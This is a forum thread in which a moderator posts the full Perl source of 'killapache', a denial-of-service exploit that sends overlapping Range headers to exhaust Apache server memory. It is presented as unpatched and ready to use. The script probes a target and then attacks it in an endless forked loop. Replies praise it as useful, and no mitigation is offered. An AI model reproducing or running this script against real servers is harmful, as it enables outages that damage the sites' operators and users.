Change background image
  1. What's up? I see you're viewing as a Guest. How about registering, it only takes like 2 minutes. This will enable you to do more on our forum and stay updated.

Apache Killer

Discussion in 'PC General' started by 3nvisi0n, Sep 5, 2011.

Thread Status:
This thread is more than 180 days old.
  1. 3nvisi0n

    3nvisi0n The R3v0lu710n Super-Mod

    I came across this earlier and figured I'd share, its a bit of PERL code and as of writting the exploit this abuses to cause the DOS is still not patched. This means all versions of Apache(Lampp/Xampp anyone?) would be vulnrable to this form of attack. The basic attack method is that this exploit works via a failure to Apache's end to handle the Range: header(used to request specific portion, or range of bytes of a file; useful for resuming downloads) properly and thus giving it several unsorted ranges to load can cause the server to malfunction. If you want a better understanding just read the code, its not too complicated.

    Code:
    #Apache httpd Remote Denial of Service (memory exhaustion)
    #By Kingcope
    #Year 2011
    #
    # Will result in swapping memory to filesystem on the remote side
    # plus killing of processes when running out of swap space.
    # Remote System becomes unstable.
    #
    
    use IO::Socket;
    use Parallel::ForkManager;
    
    sub usage {
    	print "Apache Remote Denial of Service (memory exhaustion)\n";
    	print "by Kingcope\n";
    	print "usage: perl killapache.pl <host> [numforks]\n";
    	print "example: perl killapache.pl www.example.com 50\n";
    }
    
    sub killapache {
    print "ATTACKING $ARGV[0] [using $numforks forks]\n";
    	
    $pm = new Parallel::ForkManager($numforks);
    
    $|=1;
    srand(time());
    $p = "";
    for ($k=0;$k<1300;$k++) {
    	$p .= ",5-$k";
    }
    
    for ($k=0;$k<$numforks;$k++) {
    my $pid = $pm->start and next; 	
    	
    $x = "";
    my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                     PeerPort => "80",
                         			 Proto    => 'tcp');
    
    $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
    print $sock $p;
    
    while(<$sock>) {
    }
     $pm->finish;
    }
    $pm->wait_all_children;
    print ":pPpPpppPpPPppPpppPp\n";
    }
    
    sub testapache {
    my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                     PeerPort => "80",
                         			 Proto    => 'tcp');
    
    $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
    print $sock $p;
    
    $x = <$sock>;
    if ($x =~ /Partial/) {
    	print "host seems vuln\n";
    	return 1;	
    } else {
    	return 0;	
    }
    }
    
    if ($#ARGV < 0) {
    	usage;
    	exit;	
    }
    
    if ($#ARGV > 1) {
    	$numforks = $ARGV[1];
    } else {$numforks = 50;}
    
    $v = testapache();
    if ($v == 0) {
    	print "Host does not seem vulnerable\n";
    	exit;	
    }
    while(1) {
    killapache();
    }
    Code found on: http://seclists.org/fulldisclosure/2011/Aug/175
    2 people like this.
  2. Lucky96

    Lucky96 New Member Member

    Nice I like this.:killzone:
  3. dns

    dns Active Member Admin

    This could be useful considering the vast majority of webservers are powered by apache. [xat]shifty#shh[/xat]
Thread Status:
This thread is more than 180 days old.

Share This Page